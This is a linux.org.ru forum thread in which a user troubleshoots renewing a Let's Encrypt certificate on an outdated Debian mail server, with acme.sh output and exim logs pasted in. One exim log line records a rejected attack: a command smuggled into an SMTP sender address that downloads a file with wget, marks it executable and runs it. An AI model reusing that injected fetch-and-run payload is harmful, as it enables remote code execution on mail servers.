LINUX.ORG.RU

Проблемы с Debian и сертификатом Letsencrypt

 , , , ,


1

1

Всем доброго времени суток,горящая проблема с которой не смог помочь никто: есть почтовый сервер на Debian 8/apache 5,почта exim/dovecot проблема: пришло время обновлять сертификат и вылезло что версия acme устарела,начал искать варианты решений как обновится но из за того что старая ос,были сплошные ошибки,далее связался с разработчиками letsencrypt и уже с ними вел диалог,сначала один из них предложил решение:

Download certsage.txt (25.9 KB).
Upload certsage.txt into the webroot directory for your website publicly served over port 80. This is the directory where the files are located for the content you access when you visit http://mail.ххххххх.ru. In your case, I believe this directory is /var/www/html
Rename the uploaded certsage.txt file to certsage.php.
If you open certsage.php with your favorite text editor, you will see several variables towards the top of the file that are named in all CAPITAL letters. You can change their values to your liking. In particular, the DIRECTORY variable is where your ACME account data as well as your certificate and its private key will be stored. Make sure that the DIRECTORY is somewhere inaccessible from the public internet.
Visit http://mail.хххххх.ru/certsage.php to get your certificate.

что я и сделал,но из за того что версия php старая,у меня все сваливается в 500 ошибку,обновить php не выходит из за того что пишет 404 ошибку при обновлении репозиториев,пробовал несколько мануалов по добавлению и установке,все также

Далее что было предпринято еще 1.пробовал обновлять certbot ошибки 2.пробовал устанавливать клиенты acme.sh,getssl ошибки 3. уже пробовал команду sudo certbot certonly --manual --manual-public-ip-logging-ok --preferred-challenges dns-01 --server https://acme-v02.api.letsencrypt.org/directory -d mail.хххххх.ru -m хххх@хххххх.ru с тестового debian 10 она генерирует уникальный хеш который я добавляю в новую txt запись на dns сервере,на веб морде добавить не вышло т.к. там надо тереть наши днс сервера и делегировать на чужой днс,а тогда у нас перестанет все работать и сейчас вся штука в том что запись не срабатывает т.к. мой сервер не виден во внешке,я писал уже разрабам чтоб они дали ip адрес и имя чтоб я создал новую запись типа А и установил связь между днс сервером и letsencrypt но они не дали инфу и вот идеи закончились,самый лучший вариант был бы обновить php или certbot но не выходит.

PS сразу отвечу на вопросы,обновлять систему нельзя т.к. слетит вся почта,а настраиваили ее разные люди и черти как и да я знаю что надо все переносить на свежую систему,но на это надо время и опыта маловато с настройкой,поэтому пока пробую то что выше

Буду признателен за любую помощь,сертификат не активен уже 3 дня,почта пока работает,но скоро совсем откажет


Ответ на: комментарий от Hezer

какие ошибки при установке баш скрипта? Надо только иметь ввиду, что теперь acme.sh по-дефолту выписывает серты не от letsencrypt, а от zerossl. Нужна доп. опция, чтобы использовать LE обратно.

keir ★★ ()
Ответ на: комментарий от keir

получается что сработало?

acme.sh –issue -d mail.ivanovoobl.ru -w /var/www/html [Вт авг 3 12:35:12 MSK 2021] Using CA: https://acme.zerossl.com/v2/DV90 [Вт авг 3 12:35:12 MSK 2021] Single domain=‘mail.ivanovoobl.ru’ [Вт авг 3 12:35:12 MSK 2021] Getting domain auth token for each domain [Вт авг 3 12:35:13 MSK 2021] Could not get nonce, let’s try again. [Вт авг 3 12:35:20 MSK 2021] Getting webroot for domain=‘mail.ivanovoobl.ru’ [Вт авг 3 12:35:20 MSK 2021] Verifying: mail.ivanovoobl.ru [Вт авг 3 12:35:21 MSK 2021] Processing, The CA is processing your order, pleas e just wait. (1/30) [Вт авг 3 12:35:24 MSK 2021] Success [Вт авг 3 12:35:24 MSK 2021] Verify finished, start to sign. [Вт авг 3 12:35:24 MSK 2021] Lets finalize the order. [Вт авг 3 12:35:24 MSK 2021] Le_OrderFinalize=‘https://acme.zerossl.com/v2/DV90 /order/fU_FYAWQuufO0fHUZXbbtg/finalize’ [Вт авг 3 12:35:25 MSK 2021] Order status is processing, lets sleep and retry. [Вт авг 3 12:35:25 MSK 2021] Retry after: 15 [Вт авг 3 12:35:41 MSK 2021] Polling order status: https://acme.zerossl.com/v2/ DV90/order/fU_FYAWQuufO0fHUZXbbtg [Вт авг 3 12:35:42 MSK 2021] Downloading cert. [Вт авг 3 12:35:42 MSK 2021] Le_LinkCert=‘https://acme.zerossl.com/v2/DV90/cert /s-uK5A8hcO-3ne_KrtS7xQ’ [Вт авг 3 12:35:43 MSK 2021] Cert success. —–BEGIN CERTIFICATE—– MIIGczCCBFugAwIBAgIQSVtP0mE4COKDpWZY0XHlRzANBgkqhkiG9w0BAQwFADBL MQswCQYDVQQGEwJBVDEQMA4GA1UEChMHWmVyb1NTTDEqMCgGA1UEAxMhWmVyb1NT TCBSU0EgRG9tYWluIFNlY3VyZSBTaXRlIENBMB4XDTIxMDgwMzAwMDAwMFoXDTIx MTEwMTIzNTk1OVowHTEbMBkGA1UEAxMSbWFpbC5pdmFub3Zvb2JsLnJ1MIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA+Go3omh5QApFLAgBd3TRE9njN+O6 P8X+tvYjsfXb8XGerAoCcc2m9/tNDJBHbSaOcz9rwWvwl9mVfE2hUO19HMzOPeMB lsD5JJikf6ir53MicylvECMGKcuGBcMmY5JCRQOVKCEMog7wrA0yjAs/tZFECXlK jNFW3MwMSNiIKgkvWDboGCV5+IHbd+lNLdh1/4jZmcWwkQl33ipy89p08/r/iVKz KzOq/K6fVQ/SbUFLL4jrMuL/6EWldGhX2/D8cyvCh3mO/cJdxls9AQDnuNS1jWyh TYMowL6+IZu0Lyo8ylAfYPROKPkuy1RDTZvE7C8fWkjvLS/dYXFSf+q9TwIDAQAB o4ICfzCCAnswHwYDVR0jBBgwFoAUyNl4aKLZGWjVPXLeXwo+3LWGhqYwHQYDVR0O BBYEFIRG5LAFXvxDOASURyZUDoWwC4+CMA4GA1UdDwEB/wQEAwIFoDAMBgNVHRMB Af8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjBJBgNVHSAEQjBA MDQGCysGAQQBsjEBAgJOMCUwIwYIKwYBBQUHAgEWF2h0dHBzOi8vc2VjdGlnby5j b20vQ1BTMAgGBmeBDAECATCBiAYIKwYBBQUHAQEEfDB6MEsGCCsGAQUFBzAChj9o dHRwOi8vemVyb3NzbC5jcnQuc2VjdGlnby5jb20vWmVyb1NTTFJTQURvbWFpblNl Y3VyZVNpdGVDQS5jcnQwKwYIKwYBBQUHMAGGH2h0dHA6Ly96ZXJvc3NsLm9jc3Au c2VjdGlnby5jb20wggEFBgorBgEEAdZ5AgQCBIH2BIHzAPEAdgB9PvL4j/+IVWgk wsDKnlKJeSvFDngJfy5ql2iZfiLw1wAAAXsLXi+AAAAEAwBHMEUCIQDuhh7AeYfZ +qDMV9bXeOcV0+H7UFeCLHVH9NvU1U4H8QIgMvz+lJEzypb6hKAvXSliZyrzko/2 AQDP7uSDi0avgLEAdwBElGUusO7Or8RAB9io/ijA2uaCvtjLMbU/0zOWtbaBqAAA AXsLXi9BAAAEAwBIMEYCIQDMI8Tz38K1Aq81h8aj9IohJHpnM8k/pux4C1pYfUhG AAIhAMi8nnhXLXS173SBWdZC2TiuFF/DuC7bXoSTA2l0BRVtMB0GA1UdEQQWMBSC Em1haWwuaXZhbm92b29ibC5ydTANBgkqhkiG9w0BAQwFAAOCAgEAARH4HhV6XoKs XGyY9ICKv7Z379ZGnOXfVK9MSxjLyH2PpSqxYffKtyNayF/wtG+Ab44C+qO9Yb5g +wBdN/t5Zn4cutIwZlzIXI41LSA0Hubs2thNktP4HE8XC+XPQ/aKQQq7DH6JP7m5 CbwP6D3N6XRqTMkLZe7Xpk6Opacm/I0w3uzt9DVm2VR4W7lrGF0Ok79FQAwYtC1P 2k0AYPiWI8lS1+4fAK4pRu7812T2hoFQe39jJXzhDP8gMt9ZRlfWQnVIZtVYkRz8 g7AnrxRhsP9QYKAyRNDRTIbssvQt5CJvxApQDol/wyY0Qdjzey2e7xLTVWe2L5ZM Dp8czStNhUC78bPwM8t8Fi0IuUnslgYPUsoEdmbeTFuc/UeJgJWpiy+n8/hw/4+F XXKTkHXFZMCpbK34wq4i565VngalNMBBrzosAeNm2/WaSoOVzwcwW18GBV32e/S7 Pn5ZiD0yeAkjV3PX8/JbaDmbJGLeIe2EN5gMoSknGPZd4t2Lwd8Wei53qaejYdLi MxYM+nh6dJSdFQJv7PquzhLY44mf0aZJXy74U7kvlBOC9Wl6uARNs/9qFRNwlAEt XAZNqHlajh4uqWBEzrsnRMP6VdBR68YVwxgNWD2zNuOb288dnOqcwWSQVlv7JWBD 582hirKxJp6f0D1xbqfGBnbErO8VcdY= —–END CERTIFICATE—– [Вт авг 3 12:35:43 MSK 2021] Your cert is in /root/.acme.sh/mail.ivanovoobl.ru /mail.ivanovoobl.ru.cer [Вт авг 3 12:35:43 MSK 2021] Your cert key is in /root/.acme.sh/mail.ivanovoob l.ru/mail.ivanovoobl.ru.key [Вт авг 3 12:35:43 MSK 2021] The intermediate CA cert is in /root/.acme.sh/mai l.ivanovoobl.ru/ca.cer [Вт авг 3 12:35:43 MSK 2021] And the full chain certs is there: /root/.acme.sh /mail.ivanovoobl.ru/fullchain.cer

Hezer ()
Ответ на: комментарий от Hezer

у меня все серты лежат по пути /etc/letsencrypt/archive/mail.ivanovoobl.ru и там файлы cert1.pem,chain1.pem,fullchain1.pem,privkey1.pem и каждого по 8 штук и папок ivanovoobl 3 штуки,плюсы от папки архив идут ярлыки на папку live мне ети серты надо переименовать по старому подобию?или как их поменять в ту папку и надо ли?

Hezer ()
Ответ на: комментарий от Hezer

переименовывать и переносить ничего не надо. В конце необходимая инфа:

Your cert is in /root/.acme.sh/mail.ivanovoobl.ru/mail.ivanovoobl.ru.cer
Your cert key is in /root/.acme.sh/mail.ivanovoobl.ru/mail.ivanovoobl.ru.key
The intermediate CA cert is in /root/.acme.sh/mail.ivanovoobl.ru/ca.cer
And the full chain certs is there: /root/.acme.sh/mail.ivanovoobl.ru/fullchain.cer

Просто укажите сертификат, ключ, промежуточные серты в почтовом сервере

keir ★★ ()
Ответ на: комментарий от keir

вот что в логе экзима:

аутенфикация не проходит из за ошибки чтения файла,но я только поменял сертификаты

2021-08-03 17:59:37 no IP address found for host ip-113-68.4vendeta.com (during SMTP connection from [78.128.113.68]) 2021-08-03 17:59:37 TLS error on connection from [78.128.113.68] (cert/key setup: cert=/etc/letsencrypt/live/mail.ivanovoobl.ru/fullchain.pem key=/etc/letsencrypt/live/mail.ivanovoobl.ru/privkey.pem): Error while reading file. 2021-08-03 17:59:37 fixed_login_exim4u authenticator failed for ([78.128.113.98]) [78.128.113.77]: 535 Incorrect authentication data (set_id=machetvertkova@ivanovoobl.ru) 2021-08-03 17:59:39 no IP address found for host ip-113-100.4vendeta.com (during SMTP connection from [78.128.113.100]) 2021-08-03 17:59:48 TLS error on connection from [78.128.113.74] (cert/key setup: cert=/etc/letsencrypt/live/mail.ivanovoobl.ru/fullchain.pem key=/etc/letsencrypt/live/mail.ivanovoobl.ru/privkey.pem): Error while reading file. 2021-08-03 17:59:49 fixed_login_exim4u authenticator failed for ([78.128.113.98]) [78.128.113.100]: 535 Incorrect authentication data (set_id=machetvertkova) 2021-08-03 17:59:58 H=(debian.localdomain) [109.60.188.65] F=ydP`/usr/bin/wget${IFS}192.168.0.95/KYbnRjFQEFdK${IFS}-O${IFS}/tmp/fgdojfjw``chmod${IFS}+x${IFS}/tmp/fgdojfjw``/tmp/fgdojfjw`@debian.localdomain rejected RCPT root@debian.lo$ 2021-08-03 17:59:58 unexpected disconnection while reading SMTP command from (debian.localdomain) [109.60.188.65] 2021-08-03 18:00:04 no IP address found for host ip-113-68.4vendeta.com (during SMTP connection from [78.128.113.68]) 2021-08-03 18:00:04 TLS error on connection from [78.128.113.68] (cert/key setup: cert=/etc/letsencrypt/live/mail.ivanovoobl.ru/fullchain.pem key=/etc/letsencrypt/live/mail.ivanovoobl.ru/privkey.pem): Error while reading file. 2021-08-03 18:00:16 no host name found for IP address 5.188.206.202 2021-08-03 18:00:16 TLS error on connection from [5.188.206.202] (cert/key setup: cert=/etc/letsencrypt/live/mail.ivanovoobl.ru/fullchain.pem key=/etc/letsencrypt/live/mail.ivanovoobl.ru/privkey.pem): Error while reading file. 2021-08-03 18:00:18 no host name found for IP address 5.188.206.237 2021-08-03 18:00:18 TLS error on connection from [5.188.206.237] (cert/key setup: cert=/etc/letsencrypt/live/mail.ivanovoobl.ru/fullchain.pem key=/etc/letsencrypt/live/mail.ivanovoobl.ru/privkey.pem): Error while reading file. 2021-08-03 18:00:43 TLS error on connection from [78.128.113.66] (cert/key setup: cert=/etc/letsencrypt/live/mail.ivanovoobl.ru/fullchain.pem key=/etc/letsencrypt/live/mail.ivanovoobl.ru/privkey.pem): Error while reading file.

Hezer ()
Ответ на: комментарий от keir

я указал путь до той папки где лежали старые а после переименовал их так чтоб символические ссылки указывали на них же как и было раньше

acme.sh –install-cert -d mail.ivanovoobl.ru –cert-file /etc/letsencrypt/archive/mail.ivanovoobl.ru-0003/cert.pem –key-file /etc/letsencrypt/archive/mail.ivanovoobl.ru-0003/key.pem –fullchain-file /etc/letsencrypt/archive/mail.ivanovoobl.ru-0003/fullchain.pem –reloadcmd «service apache2 force-reload»

Hezer ()
Ответ на: комментарий от Hezer

я не знаю, зачем вы переименовывали, переносили сертификаты и задавали им имена в отдельной папке. Вам acme.sh выдал место расположения новых выписанных сертификатов, которые я привел в прошлом сообщении, достаточно использовать их.

keir ★★ ()
Ответ на: комментарий от keir

просто у меня до этого сертификаты лежали в etc/letsencrypt/mail.ivanovoobl.ru и т.д. сейчас получается концепция поменялась полностью?и если я сделаю как написано и потом перезагружу dovecot и exim,сертификаты применятся?я смотрел они актуальные но видимо не с теми именами как задумано и не по нужному пути выходит?

Hezer ()
Ответ на: комментарий от keir

еще момент в том же мануале указаны

–cert-file
–key-file
–fullchain-file

у меня сейчас старые это cert.pem,chain.pem,fullchain.pem,privkey.pem

то что названия сертификатов теперь другие так и должно быть из за того что клиент поменялся?

Hezer ()